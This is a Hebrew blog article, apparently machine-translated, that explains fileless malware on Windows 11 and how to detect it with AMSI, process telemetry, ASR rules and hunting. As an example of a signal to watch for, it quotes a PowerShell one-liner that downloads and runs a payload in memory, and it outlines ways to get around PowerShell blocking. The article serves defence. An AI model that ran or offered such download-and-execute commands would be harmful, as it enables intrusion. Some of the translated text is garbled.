כיצד לזהות תוכנות זדוניות מסוכנות ללא קבצים ב-Windows 11

העדכון אחרון: 23/11/2025
מחבר: גרסיה נוצרית

  • תוכנה זדונית חסרת קבצים פועלת בזיכרון ומנצלת לרעה תהליכים לגיטימיים כמו PowerShell ו-WMI.
  • זיהוי יעיל דורש ניטור התנהגויות וניתוח זיכרון, לא רק קבצים.
  • AMSI, טלמטריית תהליכים, כללי הפחתת פני שטח וציד פרואקטיבי הם תכונות מפתח ב-Windows 11.
  • התמדה ב-WMI, רישום ו-MBR, יחד עם קושחה ו-USB, מרחיבה את משטח ההתקפה.

כיצד לזהות תוכנות זדוניות מסוכנות ללא קבצים

¿כיצד לזהות תוכנות זדוניות מסוכנות ללא קבצים? פעילות התקפות ללא קבצים גדלה משמעותית, וכדי להחמיר את המצב, Windows 11 אינו חסיןגישה זו עוקפת את הדיסק ומסתמכת על זיכרון וכלי מערכת לגיטימיים; זו הסיבה שתוכניות אנטי-וירוס מבוססות חתימות מתקשות. אם אתם מחפשים דרך אמינה לזהות זאת, התשובה טמונה בשילוב טלמטריה, ניתוח התנהגות ובקרות Windows.

במערכת האקולוגית הנוכחית, קמפיינים שמנצלים לרעה את PowerShell, WMI או Mshta מתקיימים במקביל לטכניקות מתוחכמות יותר כמו הזרקות זיכרון, שמירה על זיכרון "מבלי לגעת" בדיסק, ואפילו שימוש לרעה בקושחההמפתח הוא להבין את מפת האיומים, שלבי ההתקפה, ואילו אותות הם משאירים גם כאשר הכל קורה בתוך ה-RAM.

מהי תוכנה זדונית ללא קבצים ומדוע היא מדאיגה ב-Windows 11?

כשאנחנו מדברים על איומים "ללא קבצים", אנחנו מתייחסים לקוד זדוני ש אינך צריך להפקיד קבצי הפעלה חדשים במערכת הקבצים כדי לפעול. הוא בדרך כלל מוזרק לתהליכים הפועלים ומבוצע ב-RAM, תוך הסתמכות על מפרשים וקבצים בינאריים חתומים על ידי מיקרוסופט (למשל, PowerShell, WMI, rundll32, mshtaזה מפחית את טביעת הרגל שלך ומאפשר לך לעקוף מנועי אחסון שמחפשים רק קבצים חשודים.

אפילו מסמכי אופיס או קבצי PDF שמנצלים פגיעויות כדי להפעיל פקודות נחשבים לחלק מהתופעה, מכיוון הפעלת ביצוע בזיכרון מבלי להשאיר קבצים בינאריים שימושיים לניתוח. שימוש לרעה ב פקודות מאקרו ו-DDE ב-Office, מכיוון שהקוד פועל בתהליכים לגיטימיים כמו WinWord.

תוקפים משלבים הנדסה חברתית (פישינג, קישורי ספאם) עם מלכודות טכניות: לחיצה של המשתמש יוזמת שרשרת שבה סקריפט מוריד ומבצע את המטען הסופי בזיכרון, הימנעות מהשארת עקבות בדיסק. המטרות נעות בין גניבת נתונים ועד להפעלת תוכנת כופר, ועד לתנועה צידית שקטה.

זיהוי תוכנות זדוניות ללא קבצים

טיפולוגיות לפי טביעת רגל במערכת: מ'טהור' להיברידי

כדי להימנע מבלבלים בין מושגים, כדאי להפריד איומים לפי מידת האינטראקציה שלהם עם מערכת הקבצים. סיווג זה מבהיר מה נותר, היכן הקוד חי, ואילו סימנים הוא משאיר?.

סוג I: אין פעילות קבצים

תוכנה זדונית נטולת קבצים לחלוטין לא כותבת דבר לדיסק. דוגמה קלאסית היא ניצול של פגיעות הרשת (כמו וקטור EternalBlue פעם) כדי ליישם דלת אחורית הנמצאת בזיכרון הליבה (מקרים כמו DoublePulsar). כאן, הכל קורה ב-RAM ואין ארטיפקטים במערכת הקבצים.

אפשרות נוספת היא לזהם את הקושחה של רכיבים: BIOS/UEFI, מתאמי רשת, ציוד היקפי USB (טכניקות מסוג BadUSB) או אפילו תת-מערכות CPU. הם ממשיכים להימשך גם באמצעות הפעלה מחדש והתקנות מחדש, עם הקושי הנוסף ש מעט מוצרים בודקים קושחהאלו הן התקפות מורכבות, פחות תכופות, אך מסוכנות בשל חמקנותן ועמידותן.

סוג II: פעילות ארכיון עקיפה

כאן, התוכנה הזדונית לא "משאירה" את התוכנה הניתנת להרצה שלה, אלא משתמשת במכולות המנוהלות על ידי המערכת, אשר למעשה מאוחסנות כקבצים. לדוגמה, דלתות אחוריות ששותלות פקודות powershell במאגר WMI ולהפעיל את הפעלתו באמצעות מסנני אירועים. ניתן להתקין אותו משורת הפקודה מבלי להסיר קבצים בינאריים, אך מאגר ה-WMI נמצא בדיסק כמסד נתונים לגיטימי, מה שמקשה על ניקויו מבלי להשפיע על המערכת.

מנקודת מבט מעשית הם נחשבים ללא קבצים, מכיוון שהקונטיינר הזה (WMI, רישום וכו') זה לא קובץ הפעלה קלאסי הניתן לזיהוי והניקוי שלו אינו דבר של מה בכך. התוצאה: התמדה חשאית עם מעט מאוד עקבות "מסורתיים".

תוכן בלעדי - לחץ כאן  כיצד לבצע סריקה מלאה עם Bitdefender Antivirus Plus?

סוג III: דורש קבצים כדי לתפקד

במקרים מסוימים יש לשמור על התמדה 'ללא קובץ' ברמה הגיונית, הם זקוקים לטריגר מבוסס קובץ. הדוגמה האופיינית היא Kovter: הוא רושם פועל מעטפת עבור סיומת אקראית; כאשר קובץ עם סיומת זו נפתח, מופעל סקריפט קטן המשתמש ב-mshta.exe, אשר משחזר את המחרוזת הזדונית מהרישום.

הטריק הוא שקבצי ה"פיתיון" האלה עם סיומות אקראיות לא מכילים מטען שניתן לנתח, ועיקר הקוד נמצא ב... רישום (מיכל נוסף). זו הסיבה שהם מסווגים כחסרי קבצים מבחינת ההשפעה, למרות שבאופן דיוק הם תלויים בארטיפקט דיסק אחד או יותר כגורם מפעיל.

וקטורים ו"מארחים" של זיהום: היכן הוא נכנס והיכן הוא מסתתר

כדי לשפר את הגילוי, חיוני למפות את נקודת הכניסה ואת המארח של הזיהום. נקודת מבט זו מסייעת בתכנון בקרות ספציפיות תן עדיפות לטלמטריה מתאימה.

מעלליו

  • מבוסס קבצים (סוג III): מסמכים, קבצי הרצה, קבצי Flash/Java מדור קודם, או קבצי LNK יכולים לנצל את הדפדפן או את המנוע שמעבד אותם כדי לטעון קוד מעטפת לזיכרון. הווקטור הראשון הוא קובץ, אך המטען עובר ל-RAM.
  • מבוסס רשת (סוג I): חבילה המנצלת פגיעות (למשל, ב-SMB) משיגה ביצוע באזור המשתמש או בליבת המערכת. WannaCry הפכו גישה זו לפופולרית. טעינת זיכרון ישירה בלי קובץ חדש.

חומרה

  • התקנים (סוג I): ניתן לשנות את קושחת הדיסק או כרטיס הרשת ולהכניס קוד. קשה לבדוק אותו ונשאר מחוץ למערכת ההפעלה.
  • מערכות ניהול ומעבד (סוג I): טכנולוגיות כמו ME/AMT של אינטל הוכיחו מסלולים ל יצירת קשרים וביצוע מחוץ למערכת ההפעלההוא תוקף ברמה נמוכה מאוד, עם פוטנציאל גבוה לחמקנות.
  • USB (סוג I): BadUSB מאפשר לך לתכנת מחדש כונן USB כדי להתחזות למקלדת או כרטיס רשת (NIC) ולהפעיל פקודות או להפנות מחדש תעבורה.
  • BIOS / UEFI (סוג I): תכנות מחדש של קושחה זדונית (מקרים כמו Mebromi) שפועל לפני אתחול Windows.
  • Hypervisor (סוג I): הטמעת מיני-היפר-ויזור מתחת למערכת ההפעלה כדי להסתיר את נוכחותו. נדיר, אך כבר נצפה בצורה של רוטקיטים של היפר-ויזורים.

ביצוע והזרקה

  • מבוסס קבצים (סוג III): EXE/DLL/LNK או משימות מתוזמנות שמפעילות הזריקות לתהליכים לגיטימיים.
  • מאקרו (סוג III): VBA ב-Office יכול לפענח ולבצע מטענים, כולל תוכנות כופר מלאות, בהסכמת המשתמש באמצעות הטעיה.
  • סקריפטים (סוג II): PowerShell, VBScript או JScript מקובץ, שורת פקודה, שירותים, רישום או WMIהתוקף יכול להקליד את הסקריפט בהפעלה מרוחקת מבלי לגעת בדיסק.
  • רשומת אתחול (MBR/אתחול) (סוג II): משפחות כמו Petya דורסו את סקטור האתחול כדי להשתלט על האתחול. הוא נמצא מחוץ למערכת הקבצים, אך נגיש למערכת ההפעלה ולפתרונות מודרניים שיכולים לשחזר אותו.

כיצד פועלות התקפות ללא קבצים: שלבים ואותות

למרות שהם לא משאירים קבצי הפעלה, הקמפיינים פועלים לפי לוגיקה מדורגת. הבנתם מאפשרת ניטור. אירועים ויחסים בין תהליכים שכן משאירים חותם.

  • גישה ראשוניתהתקפות פישינג באמצעות קישורים או קבצים מצורפים, אתרים שנפגעו או אישורים גנובים. שרשראות רבות מתחילות במסמך אופיס שמפעיל פקודה PowerShell.
  • הַתמָדָהדלתות אחוריות דרך WMI (מסננים ומנויים), מפתחות ביצוע הרישום או משימות מתוזמנות שמפעילות מחדש סקריפטים ללא קובץ זדוני חדש.
  • חילוץלאחר איסוף המידע, הוא נשלח אל מחוץ לרשת באמצעות תהליכים מהימנים (דפדפנים, PowerShell, bitsadmin) כדי לערבב את התעבורה.

דפוס זה ערמומי במיוחד משום ש- אינדיקטורים להתקפה הם מסתתרים בנורמליות: ארגומנטים בשורת פקודה, שרשור תהליכים, חיבורים יוצאים חריגים, או גישה לממשקי API של הזרקה.

טכניקות נפוצות: מזיכרון ועד הקלטה

השחקנים מסתמכים על מגוון רחב של שיטות שמייעלים את ההתגנבות. כדאי להכיר את הנפוצים ביותר כדי להפעיל גילוי יעיל.

  • תושב לזכרוטעינת מטענים למרחב של תהליך מהימן הממתין להפעלה. ערכות שורשים והוקסים בליבת הגרעין, הם מעלים את רמת ההסתרה.
  • התמדה ברישוםשמרו בלובים מוצפנים במפתחות והחזירו אותם למקומם ממשגר לגיטימי (mshta, rundll32, wscript). מתקין זמני יכול להשמיד את עצמו כדי למזער את טביעת הרגל שלו.
  • פישינג של אישוריםבאמצעות שמות משתמש וסיסמאות גנובים, התוקף מבצע פקקים ושתילים מרוחקים גישה שקטה ברישום או ב-WMI.
  • תוכנת כופר 'ללא קבצים'הצפנה ותקשורת C2 מתוזמרות מ-RAM, מה שמפחית את הזדמנויות הגילוי עד שהנזק נראה לעין.
  • ערכות הפעלה: שרשראות אוטומטיות המזהות פגיעויות ופורסות מטענים מבוססי זיכרון בלבד לאחר לחיצה של המשתמש.
  • מסמכים עם קודפקודות מאקרו ומנגנונים כמו DDE שמפעילים פקודות מבלי לשמור קבצים הרצה בדיסק.
תוכן בלעדי - לחץ כאן  כיצד לשלול גישה לאתר

מחקרים בתעשייה כבר הראו שיאים בולטים: בתקופה אחת של 2018, עלייה של מעל 90% בהתקפות מבוססות סקריפטים ושרשרת PowerShell, סימן לכך שהווקטור מועדף בשל יעילותו.

האתגר עבור חברות וספקים: מדוע חסימה אינה מספיקה

זה יהיה מפתה להשבית את PowerShell או לאסור פקודות מאקרו לנצח, אבל היית שובר את המבצעPowerShell הוא עמוד תווך של ניהול מודרני ו-Office חיוני לעסקים; חסימה עיוורת לרוב אינה אפשרית.

יתר על כן, ישנן דרכים לעקוף בקרות בסיסיות: הפעלת PowerShell דרך קבצי DLL ו- rundll32, אריזת סקריפטים לתוך קבצי EXE, הבא עותק משלך של PowerShell או אפילו להסתיר סקריפטים בתמונות ולחלץ אותם לזיכרון. לכן, ההגנה לא יכולה להתבסס אך ורק על הכחשת קיומם של כלים.

טעות נפוצה נוספת היא להעביר את כל ההחלטה לענן: אם הסוכן צריך להמתין לתגובה מהשרת, אתה מאבד את המניעה בזמן אמתניתן להעלות נתוני טלמטריה כדי להעשיר את המידע, אך ה- יש להקל על ההפחתה בנקודת הקצה.

כיצד לזהות תוכנות זדוניות ללא קבצים ב-Windows 11: טלמטריה והתנהגות

האסטרטגיה המנצחת היא ניטור תהליכים וזיכרוןלא קבצים. התנהגויות זדוניות יציבות יותר מהצורות של קובץ, מה שהופך אותן לאידיאליות למנועי מניעה.

  • AMSI (ממשק סריקה נגד תוכנות זדוניות)הוא מיירט סקריפטים של PowerShell, VBScript או JScript גם כאשר הם בנויים באופן דינמי בזיכרון. מצוין ללכידת מחרוזות מעורפלות לפני ביצוע.
  • ניטור תהליכים: התחלה/סיום, PID, הורים וילדים, מסלולים, שורות פקודה ו-hashes, בתוספת עצי ביצוע כדי להבין את הסיפור המלא.
  • ניתוח זיכרון: זיהוי של הזרקות, עומסים מחזירי אור או PE מבלי לגעת בדיסק, וסקירה של אזורים ניתנים לביצוע יוצאי דופן.
  • הגנה על מגזר המתנע: בקרה ושחזור של ה-MBR/EFI במקרה של חבלה.

במערכת האקולוגית של מיקרוסופט, Defender for Endpoint משלב AMSI, ניטור התנהגותסריקת זיכרון ולמידת מכונה מבוססת ענן משמשות להגדלת אפשרויות הזיהוי כנגד וריאנטים חדשים או מעורפלים. ספקים אחרים משתמשים בגישות דומות עם מנועי ליבה.

דוגמה ריאליסטית לקורלציה: ממסמך ל-PowerShell

דמיינו שרשרת שבה Outlook מוריד קובץ מצורף, Word פותח את המסמך, תוכן פעיל מופעל ו-PowerShell מופעל עם פרמטרים חשודים. טלמטריה נכונה תציג את שורת פיקוד (למשל, עקיפת ExecutionPolicy, חלון נסתר), התחברות לדומיין לא מהימן ויצירת תהליך צאצא שמתקין את עצמו ב-AppData.

סוכן בעל הקשר מקומי מסוגל ל לעצור ולאחור פעילות זדונית ללא התערבות ידנית, בנוסף להודעה ל-SIEM או באמצעות דוא"ל/SMS. מוצרים מסוימים מוסיפים שכבת ייחוס סיבה בסיסית (מודלים מסוג StoryLine), אשר מצביעה לא על התהליך הנראה לעין (Outlook/Word), אלא על שרשור זדוני מלא ומקורו לניקוי מקיף של המערכת.

תבנית פקודה אופיינית שכדאי לשים לב אליה עשויה להיראות כך: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');לוגיקה אינה המחרוזת המדויקת, אבל קבוצת האותותעקיפת מדיניות, חלון נסתר, הורדה נקייה וביצוע בזיכרון.

AMSI, צינור התהליכים ותפקידו של כל שחקן: מנקודת הקצה ועד ל-SOC

מעבר ללכידת סקריפטים, ארכיטקטורה חזקה מתזמרת שלבים המאפשרים חקירה ותגובה. ככל שיהיו יותר ראיות לפני ביצוע העומס, כך ייטב., הטוב ביותר.

  • יירוט סקריפטAMSI מספקת את התוכן (גם אם הוא נוצר תוך כדי תנועה) לניתוח סטטי ודינמי בצינור של תוכנות זדוניות.
  • אירועי תהליךנאספים PIDs, קבצי בינארי, קובצי hash, נתיבים ונתונים אחרים. ויכוחים, וקביעת עצי התהליך שהובילו לעומס הסופי.
  • זיהוי ודיווחהזיהויים מוצגים בקונסולת המוצר ומועברים לפלטפורמות רשת (NDR) לצורך הצגת קמפיינים.
  • ערבויות המשתמשאפילו אם מוזרק סקריפט לזיכרון, המסגרת AMSI מיירט את זה בגרסאות תואמות של Windows.
  • יכולות מנהל מערכת: תצורת מדיניות כדי לאפשר בדיקת סקריפטים, חסימה מבוססת התנהגות ויצירת דוחות מהקונסול.
  • עבודת SOCחילוץ של ארטיפקטים (UUID של מכונה וירטואלית, גרסת מערכת הפעלה, סוג סקריפט, תהליך היוזם והאב שלו, גיבוב ושורות פקודה) כדי לשחזר את ההיסטוריה ו חוקי הרמה עתיד.
תוכן בלעדי - לחץ כאן  כמה גרסאות של Avast Security for Mac זמינות?

כאשר הפלטפורמה מאפשרת ייצוא של מאגר זיכרון בקשר לביצוע, חוקרים יכולים לייצר גילויים חדשים ולהעשיר את ההגנה מפני וריאנטים דומים.

אמצעים מעשיים ב-Windows 11: מניעה וחיפוש

התקנת Windows 11 בצורה נכונה בשנת 2025

בנוסף ל-EDR עם בדיקת זיכרון ו-AMSI, Windows 11 מאפשר לך לסגור חללי התקפה ולשפר את הנראות עם פקדים מקוריים.

  • רישום ומגבלות ב-PowerShellמאפשר רישום בלוקי סקריפטים ורישום מודולים, מחיל מצבים מוגבלים במידת האפשר, ושולט בשימוש ב- עקיפה/מוסתר.
  • כללי הפחתת משטח התקפה (ASR)חוסם הפעלת סקריפטים על ידי תהליכי Office ו- שימוש לרעה ב-WMI/PSExec כאשר אין צורך בכך.
  • מדיניות מאקרו של משרד: מבטל כברירת מחדל חתימה פנימית של מאקרו ורשימות אמון מחמירות; מנטר זרימות DDE מדור קודם.
  • ביקורת ורישום של WMI: מנטר מנויי אירועים ומפתחות ביצוע אוטומטיים (Run, RunOnce, Winlogon), וכן יצירת משימות מתוזמן.
  • הגנה על אתחולמפעיל אתחול מאובטח, בודק את תקינות MBR/EFI ומאמת שאין שינויים בעת האתחול.
  • טלאים והקשחהסוגר פגיעויות הניתנות לניצול בדפדפנים, רכיבי Office ושירותי רשת.
  • קונסיינסיאןמכשיר משתמשים וצוותים טכניים בנושא פישינג ואיתותים של הוצאות להורג חשאיות.

לצורך חיפוש, התמקדו בשאילתות בנושא: יצירת תהליכים על ידי Office לכיוון PowerShell/MSHTA, ארגומנטים עם הורדת מחרוזת/הורדת קובץסקריפטים עם ערפול ברור, הזרקות רפלקטיביות ורשתות יוצאות ל-TLDs חשודים. הפניה צולבת של אותות אלה עם מוניטין ותדירות כדי להפחית רעש.

מה כל מנוע יכול לזהות כיום?

פתרונות הארגון של מיקרוסופט משלבים AMSI, ניתוח התנהגותי, לבחון את הזיכרון והגנה על סקטור האתחול, בנוסף למודלי למידה מבוססי ענן כדי להתרחב כנגד איומים מתעוררים. ספקים אחרים מיישמים ניטור ברמת הליבה כדי להבדיל בין תוכנות זדוניות לתוכנות שפירות עם ביטול אוטומטי של שינויים.

גישה המבוססת על סיפורי הוצאות להורג זה מאפשר לך לזהות את שורש הבעיה (לדוגמה, קובץ מצורף של Outlook שמפעיל שרשרת) ולמתן טיפול בכל העץ: סקריפטים, מפתחות, משימות וקבצים בינאריים ביניים, תוך הימנעות מלהיתקע על הסימפטום הנראה לעין.

טעויות נפוצות וכיצד להימנע מהן

כיצד לנקות את הרישום של Windows מבלי לשבור שום דבר

חסימת PowerShell ללא תוכנית ניהול חלופית היא לא רק לא מעשית, אלא שיש גם... דרכים להפעיל אותו בעקיפיןאותו הדבר חל על פקודות מאקרו: או שאתם מנהלים אותן באמצעות מדיניות וחתימות, או שהעסק יסבול. עדיף להתמקד בטלמטריה ובכללים התנהגותיים.

טעות נפוצה נוספת היא האמונה שאפליקציות ברשימה הלבנה פותרות הכל: טכנולוגיה ללא קבצים מסתמכת בדיוק על כך. אפליקציות מהימנותעל הבקרה לבחון מה הם עושים וכיצד הם מתייחסים, לא רק האם מותר להם.

עם כל האמור לעיל, תוכנות זדוניות ללא קבצים מפסיקות להיות "רוח רפאים" כשאתם עוקבים אחר מה שחשוב באמת: התנהגות, זיכרון ומוצא של כל ביצוע. שילוב של AMSI, טלמטריית תהליכים עשירה, בקרות Windows 11 מקוריות ושכבת EDR עם ניתוח התנהגותי מעניק לכם יתרון. הוסיפו למשוואה מדיניות ריאליסטית עבור פקודות מאקרו ו-PowerShell, ביקורת WMI/Registry וחיפוש (ציד) שנותן עדיפות לשורות פקודה ועצי תהליכים, ותקבלו הגנה שחותכת את השרשראות הללו לפני שהן משמיעות קול.

Artaculo relacionado:
רשת מחשבים